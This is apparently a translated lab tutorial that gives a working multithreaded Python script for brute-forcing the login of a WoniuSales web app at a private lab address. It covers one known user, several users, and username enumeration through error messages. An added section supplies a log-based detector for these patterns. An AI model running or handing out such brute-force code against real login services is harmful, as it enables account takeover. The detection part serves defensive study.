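Preface
Logging in to the lab target system: brute-forcing the password
Iterate over the password dictionary -> send the login request -> collect the response that passes verification -> the correct password
1. Single user
2. Multiple users, usernames known
3. Multiple users, user information unknown
Password brute-forcing in Python uses three modules: time, requests, threading
The brute-force source code follows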
import time
import threading

import requests


# Scenario 1: one known user ("lency"), passwords tried one after another.
def login():
    url = 'http://192.168.14.148:8080/woniusales/user/login'
    with open('password-top500.txt', 'r') as fp:
        datas = fp.readlines()
    for dt in datas:
        password = dt.strip()
        data = {"username": "lency", "password": password, "verifycode": "0000"}
        res = requests.post(url=url, data=data)
        # Any response other than 'login-fail' is treated as a successful login.
        if res.text != 'login-fail':
            # Message: "brute force succeeded, the password is: ..."
            print(f'爆破成功,密码为:{password}')
            break


# One attempt with one password, written as a thread target (not called below).
def login_thread(password):
    url = 'http://192.168.14.148:8080/woniusales/user/login'
    data = {"username": "lency", "password": password, "verifycode": "0000"}
    res = requests.post(url=url, data=data)
    if res.text != 'login-fail':
        print(f'爆破成功,密码为:{password}')


# Scenarios 2 and 3: one thread per candidate username, each walking the password list.
def do_login(username):
    url = 'http://192.168.14.148:8080/woniusales/user/login'
    with open('password-top500.txt', 'r') as fp:
        datas = fp.readlines()
    time.sleep(0.2)
    for dt in datas:
        password = dt.strip()
        data = {"username": username, "password": password, "verifycode": "0000"}
        res = requests.post(url=url, data=data)
        #print(res.text)
        if res.text != 'login-fail' and res.text != 'user not exists':
            # Message: "brute force succeeded, the user is: ..., the password is: ..."
            print(f'爆破成功,用户为:{username},密码为:{password}')
            # The original called exit() here; inside a thread that ends
            # only this thread, and the other threads keep running.
            return


if __name__ == '__main__':
    # with open('password-top3000.txt','r') as fp:
    with open('username-top500.txt', 'r') as fp:
        datas = fp.readlines()
    ths = []
    for dt in datas:
        username = dt.strip()
        th = threading.Thread(target=do_login, args=(username,))
        ths.append(th)
    for t in ths:
        t.start()
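You need a password dictionary and a username dictionary, and a packet capture tool is also required.
Whether the brute force succeeds depends on your computer's configuration, the size of the dictionaries, and the time available.
Brute-forcing the password of a specified user whose username is already known is relatively easy.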
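Seen from the defending side, the three scenarios listed at the top each leave a different trace in the login log. The detector below is an added example, not code from the original post; the log tuple format, the thresholds and the sample addresses are assumptions, while the response strings 'login-fail' and 'user not exists' are the ones the script above checks.

```python
from collections import defaultdict, deque

WINDOW = 60      # seconds of history kept per source (assumed threshold)
MAX_FAILS = 5    # 'login-fail' count for one username (assumed threshold)
MAX_USERS = 4    # distinct usernames that failed (assumed threshold)
MAX_UNKNOWN = 4  # 'user not exists' responses (assumed threshold)

def detect(events):
    """events: (ts_seconds, src_ip, username, response) tuples sorted by time.
    Returns {src_ip: set of alert labels}."""
    recent = defaultdict(deque)   # src_ip -> failed attempts inside WINDOW
    alerts = defaultdict(set)
    for ts, src, user, response in events:
        if response not in ("login-fail", "user not exists"):
            continue              # successful logins are not counted
        q = recent[src]
        q.append((ts, user, response))
        while ts - q[0][0] > WINDOW:   # drop attempts older than the window
            q.popleft()
        fails = defaultdict(int)  # username -> wrong-password count
        unknown = 0
        for _, u, r in q:
            if r == "login-fail":
                fails[u] += 1
            else:
                unknown += 1
        if fails and max(fails.values()) >= MAX_FAILS:
            alerts[src].add("single-user-bruteforce")   # scenario 1
        if len(fails) >= MAX_USERS:
            alerts[src].add("multi-user-guessing")      # scenario 2
        if unknown >= MAX_UNKNOWN:
            alerts[src].add("username-enumeration")     # scenario 3
    return dict(alerts)

# Constructed sample log, not taken from the lab system.
SAMPLE = (
    [(t, "10.0.0.5", "lency", "login-fail") for t in range(6)]
    + [(10 + t, "10.0.0.6", f"user{t}", "user not exists") for t in range(5)]
    + [(20 + t, "10.0.0.7", f"staff{t}", "login-fail") for t in range(4)]
    + [(30, "10.0.0.8", "alice", "login-fail"), (35, "10.0.0.8", "alice", "ok")]
)

if __name__ == "__main__":
    for src, labels in sorted(detect(SAMPLE).items()):
        print(src, sorted(labels))
```

Counting per source address misses guessing that is spread over many addresses; counting failures per username as well covers that case.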